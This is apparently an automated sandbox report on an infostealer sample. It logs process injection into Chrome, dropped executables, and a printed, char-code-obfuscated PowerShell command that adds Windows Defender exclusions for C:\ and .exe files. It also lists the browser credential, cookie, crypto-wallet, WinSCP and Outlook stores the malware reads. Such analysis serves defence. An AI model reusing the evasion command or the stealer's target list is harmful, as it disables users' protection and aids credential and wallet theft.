                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
                      Source: C:\Users\user\AppData\Roaming\a.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 4100AE
                      Source: C:\Users\user\AppData\Roaming\a.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 5E00AE
                      Source: C:\Users\user\AppData\Roaming\a.exe	Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 5300AE
                      Source: C:\Users\user\AppData\Roaming\a.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 4410000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\a.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 5530000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Memory written: C:\Users\user\AppData\Local\Temp\Gelelx.exe base: BC0000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Memory written: C:\Users\user\AppData\Local\Temp\Vhbyv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\license.exe	Memory written: C:\Users\user\AppData\Roaming\license.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Thread register set: target process: 4032
                      Source: C:\Users\user\AppData\Roaming\a.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 4410000
                      Source: C:\Users\user\AppData\Roaming\a.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 410000
                      Source: C:\Users\user\AppData\Roaming\a.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 5530000
                      Source: C:\Users\user\AppData\Roaming\a.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 530000
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Process created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe"
                      Source: C:\Users\user\AppData\Roaming\a.exe	Process created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Process created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Process created: C:\Users\user\AppData\Local\Temp\Gelelx.exe "C:\Users\user\AppData\Local\Temp\Gelelx.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Process created: C:\Users\user\AppData\Local\Temp\Vhbyv.exe "C:\Users\user\AppData\Local\Temp\Vhbyv.exe"
                      Source: C:\Users\user\AppData\Roaming\license.exe	Process created: C:\Users\user\AppData\Roaming\license.exe "C:\Users\user\AppData\Roaming\license.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionpath ([char]67+[char]58+[char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionextension 'exe'"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionpath ([char]67+[char]58+[char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -exclusionextension 'exe'"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\a.exe	Queries volume information: C:\Users\user\AppData\Roaming\a.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Gelelx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Vhbyv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Gelelx.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\license.exe	Queries volume information: C:\Users\user\AppData\Roaming\license.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\license.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\license.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Vhbyv.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\license.exe	Queries volume information: C:\Users\user\AppData\Roaming\license.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\hosts.exe	Queries volume information: C:\Users\user\AppData\Roaming\hosts.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\AppData\Roaming\a.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match	File source: Process Memory Space: a.exe PID: 7908, type: MEMORYSTR
                      Source: Yara match	File source: Process Memory Space: chrome.exe PID: 8024, type: MEMORYSTR
                      Source: Yara match	File source: Process Memory Space: chrome.exe PID: 8044, type: MEMORYSTR
                      Source: Yara match	File source: Process Memory Space: chrome.exe PID: 8024, type: MEMORYSTR
                      Source: a.exe, 0000000B.00000002.1806616059.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: *|*|electrum9004
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectronCash
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty!
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\configigfig\Config.json
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
                      Source: powershell.exe, 00000001.00000002.1173728731.00000000058D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                      Source: C:\Users\user\AppData\Roaming\a.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                      Source: C:\Users\user\AppData\Roaming\a.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\enus_denylist_encoded_241007.txt
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\15\E6DC4029A1E4B4C1\44AEBF4FF9BFF124\VERSION.txt
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\vocab_en-us.txt
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\15\E6DC4029A1E4B4C1\44AEBF4FF9BFF124\VERSION.txt
                      Source: C:\Users\user\AppData\Roaming\a.exe	File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\vocab_en-us.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\vocab_en-us.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\15\E6DC4029A1E4B4C1\44AEBF4FF9BFF124\VERSION.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\optimization_guide_model_store\24\E6DC4029A1E4B4C1\FB2428E81C4EC4AD\enus_denylist_encoded_241007.txtJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\AppData\Roaming\a.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 0000000D.00000002.1487750911.0000020D463C5000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1513482076.0000021F27775000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: a.exe PID: 7908, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: chrome.exe PID: 8024, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: chrome.exe PID: 8044, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match | File source: Process Memory Space: a.exe PID: 7908, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: chrome.exe PID: 8024, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: chrome.exe PID: 8044, type: MEMORYSTR
MITRE ATT&CK Matrix

